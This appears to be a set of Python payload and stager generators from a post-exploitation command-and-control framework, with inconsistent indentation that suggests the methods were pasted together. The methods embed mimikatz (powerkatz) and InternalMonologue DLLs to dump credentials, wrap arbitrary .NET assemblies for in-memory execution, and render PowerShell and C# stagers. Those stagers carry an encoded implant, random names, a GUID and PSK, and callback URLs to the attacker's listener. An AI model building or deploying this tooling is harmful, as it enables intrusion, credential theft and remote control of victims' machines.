 def payload(self):
     """Render the mimikatz Boo module with both powerkatz PE blobs embedded.

     Reads the x86 and x64 DLLs plus the Boo template, then substitutes the
     COMPRESSED_PE_x86 / COMPRESSED_PE_x64 placeholders with the deflated and
     encoded DLL bytes, and MIMIKATZ_COMMAND with the module's ``Command``
     option value.

     Returns:
         str: the rendered module source.
     """
     x86_path = 'core/teamserver/data/powerkatz_x86.dll'
     x64_path = 'core/teamserver/data/powerkatz_x64.dll'
     template_path = 'core/teamserver/modules/boo/src/mimikatz.boo'
     with open(x86_path, 'rb') as pe_x86, \
             open(x64_path, 'rb') as pe_x64, \
             open(template_path, 'r') as template_file:
         rendered = template_file.read()
         # Placeholder -> replacement, applied in the same order as before;
         # values are plain substring substitutions, nothing is escaped.
         substitutions = (
             ("COMPRESSED_PE_x86", dotnet_deflate_and_encode(pe_x86.read())),
             ("COMPRESSED_PE_x64", dotnet_deflate_and_encode(pe_x64.read())),
             ("MIMIKATZ_COMMAND", self.options['Command']['Value']),
         )
         for placeholder, value in substitutions:
             rendered = rendered.replace(placeholder, value)
         return rendered
    def payload(self):
        """Render the execute-assembly Boo module around a user-supplied .NET assembly.

        The ``Assembly`` option is expanded with ``os.path.expanduser`` and must
        exist on disk. Its bytes are deflated and encoded into the
        B64_ENCODED_COMPRESSED_ASSEMBLY placeholder and its on-disk size into
        DECOMPRESSED_ASSEMBLY_LENGTH. A non-empty ``Arguments`` option is
        tokenised with ``split`` and emitted as a Boo ``array(string, (...))``
        literal in place of ASSEMBLY_ARGS (empty string otherwise).

        Returns:
            str: the rendered module source (also echoed to stdout).

        Raises:
            Exception: if the ``Assembly`` path does not exist.
        """
        template_path = 'core/teamserver/modules/boo/src/execute-assembly.boo'
        with open(template_path) as template_file:
            rendered = template_file.read()
            assembly_path = os.path.expanduser(self.options['Assembly']['Value'])
            if not os.path.exists(assembly_path):
                raise Exception("Assembly not found in specified path")

            decompressed_length = os.path.getsize(assembly_path)
            with open(assembly_path, 'rb') as assembly_file:
                encoded_assembly = dotnet_deflate_and_encode(assembly_file.read())
                rendered = rendered.replace("B64_ENCODED_COMPRESSED_ASSEMBLY", encoded_assembly)
                rendered = rendered.replace("DECOMPRESSED_ASSEMBLY_LENGTH", str(decompressed_length))

                raw_arguments = self.options['Arguments']['Value']
                array_literal = ''
                if raw_arguments:
                    # Each token is wrapped in backticks, giving e.g.
                    # `= array(string, (`a`, `b`))`; tokens are not escaped.
                    quoted_tokens = [fr"`{token}`" for token in split(raw_arguments)]
                    joined_tokens = r', '.join(quoted_tokens)
                    array_literal = f"= array(string, ({joined_tokens}))"

                rendered = rendered.replace("ASSEMBLY_ARGS", array_literal)
                # NOTE(review): the full rendered payload is written to stdout here;
                # looks like a leftover debug print — confirm before relying on it.
                print(rendered)
                return rendered
 def payload(self):
     """Render the internalmonologue Boo module with its DLL and options inlined.

     The DLL bytes are deflated and encoded into the INTERNAL_MONOLOGUE_DLL
     placeholder. Each ``<key>=`` marker in the template is then replaced by
     ``<key>=<option value>``, lower-cased as a whole; the ``Challenge`` value
     is additionally wrapped in double quotes before lower-casing.

     Returns:
         str: the rendered module source.
     """
     dll_path = 'core/teamserver/data/internalmonologue.dll'
     template_path = 'core/teamserver/modules/boo/src/internalmonologue.boo'
     # (template marker, option name, wrap the value in double quotes?)
     option_markers = (
         ("impersonate", 'Impersonate', False),
         ("threads", 'Threads', False),
         ("downgrade", 'Downgrade', False),
         ("restore", 'Restore', False),
         ("challenge", 'Challenge', True),
         ("verbose", 'Verbose', False),
     )
     with open(dll_path, 'rb') as dll_file, open(template_path) as template_file:
         rendered = template_file.read()
         rendered = rendered.replace("INTERNAL_MONOLOGUE_DLL",
                                     dotnet_deflate_and_encode(dll_file.read()))
         for marker, option_name, quote_value in option_markers:
             value = self.options[option_name]['Value']
             if quote_value:
                 assignment = f'{marker}="{value}"'
             else:
                 assignment = f"{marker}={value}"
             # .lower() is applied to the whole "key=value" text, not just the value.
             rendered = rendered.replace(f"{marker}=", assignment.lower())
     return rendered
    def generate(self, listener):
        """Render the PowerShell stager template for *listener*.

        The C2 URL is built from ``listener.name``, ``listener['BindIP']`` and
        ``listener['Port']``. When the ``AsFunction`` option is truthy the
        template body is wrapped in an ``Invoke-<RANDOM>`` PowerShell function
        that is then called with ``-Url``; otherwise the literal ``$Url`` token
        is replaced by the double-quoted URL. The naga.exe bytes are deflated
        and encoded into BASE64_ENCODED_ASSEMBLY and their raw length into
        DATA_LENGTH.

        Returns:
            str: the rendered stager text.
        """
        assembly_path = './core/teamserver/data/naga.exe'
        template_path = 'core/teamserver/stagers/templates/posh.ps1'
        with open(assembly_path, 'rb') as assembly_file, open(template_path) as template_file:
            body = template_file.read()
            c2_url = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"

            # NOTE(review): bool() of any non-empty string (e.g. 'False') is True,
            # so this only acts as an on/off switch if Value is already a bool —
            # confirm how the option is stored.
            wrap_in_function = bool(self.options['AsFunction']['Value']) is True
            if wrap_in_function:
                function_name = gen_random_string(6).upper()
                body = f"""function Invoke-{function_name}
{{
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)][String]$Url
    )

    {body}
}}
Invoke-{function_name} -Url "{c2_url}"
"""
            else:
                body = body.replace("$Url", f'"{c2_url}"')

            raw_assembly = assembly_file.read()
            body = body.replace("BASE64_ENCODED_ASSEMBLY", dotnet_deflate_and_encode(raw_assembly))
            body = body.replace("DATA_LENGTH", str(len(raw_assembly)))
            return body
 def generate(self, listener):
     """Render the C# stager template for *listener*.

     CLASS_NAME is replaced with an 8-character random, digit-free name,
     C2_URL with ``<listener.name>://<BindIP>:<Port>`` and
     BASE64_ENCODED_ASSEMBLY with the deflated and encoded bytes of naga.exe.

     Returns:
         str: the rendered stager source.
     """
     assembly_path = './core/teamserver/data/naga.exe'
     template_path = './core/teamserver/stagers/templates/csharp.cs'
     with open(assembly_path, 'rb') as assembly_file, open(template_path) as template_file:
         rendered = template_file.read()
         # Plain substring substitutions, applied in this order.
         replacements = (
             ("CLASS_NAME", gen_random_string_no_digits(8)),
             ('C2_URL', f"{listener.name}://{listener['BindIP']}:{listener['Port']}"),
         )
         for placeholder, value in replacements:
             rendered = rendered.replace(placeholder, value)
         rendered = rendered.replace("BASE64_ENCODED_ASSEMBLY",
                                     dotnet_deflate_and_encode(assembly_file.read()))
         return rendered
    def generate(self, listener):
        """Render the PowerShell stager for *listener* with a fresh GUID and PSK.

        The URL list is ``<listener.name>://<BindIP>:<Port>`` joined with the
        listener's ``CallBackURls`` value by a comma (falsy entries dropped).
        With ``AsFunction`` the template body is wrapped in an
        ``Invoke-<RANDOM>`` function called with -Guid/-Psk/-Url; otherwise the
        ``$Url``, ``$Guid`` and ``$Psk`` tokens are replaced in place. The
        naga.exe bytes go into BASE64_ENCODED_ASSEMBLY and their raw length
        into DATA_LENGTH.

        Returns:
            tuple: ``(guid, psk, template)`` — the ``uuid.UUID``, the PSK from
            ``gen_stager_psk()`` and the rendered stager text.
        """
        assembly_path = './core/teamserver/data/naga.exe'
        template_path = 'core/teamserver/stagers/templates/posh.ps1'
        with open(assembly_path, 'rb') as assembly_file, open(template_path) as template_file:
            body = template_file.read()
            primary_url = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
            # filter(None, ...) drops a falsy CallBackURls so no trailing comma is emitted.
            c2_urls = ','.join(filter(None, [primary_url, listener['CallBackURls']]))

            guid = uuid.uuid4()
            psk = gen_stager_psk()

            # NOTE(review): bool() of any non-empty string (e.g. 'False') is True,
            # so this only acts as an on/off switch if Value is already a bool —
            # confirm how the option is stored.
            if bool(self.options['AsFunction']['Value']) is True:
                function_name = gen_random_string(6).upper()
                body = f"""function Invoke-{function_name}
{{
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)][String]$Guid,
        [Parameter(Mandatory=$true)][String]$Psk,
        [Parameter(Mandatory=$true)][String]$Url
    )

    {body}
}}
Invoke-{function_name} -Guid '{guid}' -Psk '{psk}' -Url '{c2_urls}'
"""
            else:
                for token, value in (("$Url", c2_urls), ("$Guid", guid), ("$Psk", psk)):
                    body = body.replace(token, f'{value}')

            raw_assembly = assembly_file.read()
            body = body.replace("BASE64_ENCODED_ASSEMBLY", dotnet_deflate_and_encode(raw_assembly))
            body = body.replace("DATA_LENGTH", str(len(raw_assembly)))
            return guid, psk, body
    def generate(self, listener):
        """Render the C# stager for *listener* with a fresh GUID and PSK.

        CLASS_NAME becomes an 8-character random, digit-free name; GUID, PSK
        and URLS are replaced by the new ``uuid.uuid4()``, the value from
        ``gen_stager_psk()`` and the comma-joined URL list
        (``<listener.name>://<BindIP>:<Port>`` plus ``CallBackURls``, falsy
        entries dropped). BASE64_ENCODED_ASSEMBLY receives the deflated and
        encoded bytes of naga.exe.

        Returns:
            tuple: ``(guid, psk, template)`` — the ``uuid.UUID``, the PSK and
            the rendered stager source.
        """
        assembly_path = './core/teamserver/data/naga.exe'
        template_path = './core/teamserver/stagers/templates/csharp.cs'
        with open(assembly_path, 'rb') as assembly_file, open(template_path) as template_file:
            guid = uuid.uuid4()
            psk = gen_stager_psk()

            primary_url = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
            c2_urls = ','.join(filter(None, [primary_url, listener['CallBackURls']]))

            rendered = template_file.read()
            # Plain substring substitutions applied in this order. GUID/PSK/URLS
            # are short tokens replaced after CLASS_NAME, so a generated class
            # name containing one of them would be rewritten too — presumably
            # never the case; verify against gen_random_string_no_digits.
            replacements = (
                ("CLASS_NAME", gen_random_string_no_digits(8)),
                ('GUID', str(guid)),
                ('PSK', psk),
                ('URLS', c2_urls),
            )
            for placeholder, value in replacements:
                rendered = rendered.replace(placeholder, value)
            rendered = rendered.replace("BASE64_ENCODED_ASSEMBLY",
                                        dotnet_deflate_and_encode(assembly_file.read()))
            return guid, psk, rendered